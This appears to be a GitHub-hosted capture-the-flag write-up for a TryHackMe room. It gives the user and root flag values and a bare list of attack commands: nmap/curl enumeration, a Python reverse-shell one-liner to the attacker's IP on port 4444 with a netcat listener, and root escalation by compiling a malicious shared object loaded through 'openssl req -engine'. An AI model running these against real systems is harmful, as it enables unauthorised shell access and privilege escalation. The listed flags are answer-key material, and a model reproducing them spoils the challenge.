Skip to content

Latest commit

 

History

History
29 lines (27 loc) · 1.12 KB

writeup.md

File metadata and controls

29 lines (27 loc) · 1.12 KB
Just a terrible idea...

Task 1. Capture the flags

No hints. Hack it. Don't give up if you get stuck, enumerate harder

User flag.

thm{411f7d38247ff441ce4e134b459b6268}
  • nmap -sSCV <IP>
  • curl -s http://<IP>
  • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("my_own_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
  • nc -nlvp 4444
  • curl -d "+++++ +++++ [REDACTED] ++ ++<]> ++.<" -X POST http://<IP>/api/bf
  • cat /home/user.txt

+ 50 Root flag.```

thm{1974a617cc84c5b51411c283544ee254}
  • cat server.service
  • gcc -fPIC -o rootshell.o -c rootshell.c
  • gcc -shared -o rootshell.so -lcrypto rootshell.o
  • chmod +x rootshell.so
  • openssl req -engine ./rootshell.so
  • cat /root/root.txt